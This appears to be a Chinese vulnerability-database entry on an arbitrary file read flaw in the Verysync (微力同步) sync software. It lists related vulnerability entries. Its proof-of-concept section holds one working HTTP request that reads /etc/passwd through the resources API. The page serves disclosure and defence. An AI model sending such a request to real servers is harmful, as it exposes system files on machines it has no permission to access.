微力同步Verysync resources 任意文件读取漏洞

漏洞描述

PoC代码

GET /rest/f/api/resources/f96956469e7be39d/etc/passwd?override=false HTTP/1.1
Host:

相关漏洞推荐

• 微力同步-VeriSync resources 任意文件读取漏洞
• 微力同步 /rest/f/api/raw/f96956469e7be39d 文件读取漏洞（CVE-2025-14197）
• POC eks-aws-managed-iam-policy: Use AWS-managed policy to manage AWS resources
• POC skimresources-r-csp-bypass: Content-Security-Policy Bypass - SkimResources R
• 电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞
• BladeX swagger-resources 资源存在未授权访问
• 中科聚网一体化运营平台 /resources/files/ue/word 任意文件上传漏洞
• 中科聚网一体化运营平台 /resources/files/ue/catchByUrl 文件上传漏洞
• 联软科技 UniEMM 企业移动安全管理平台emm-resources命令注入漏洞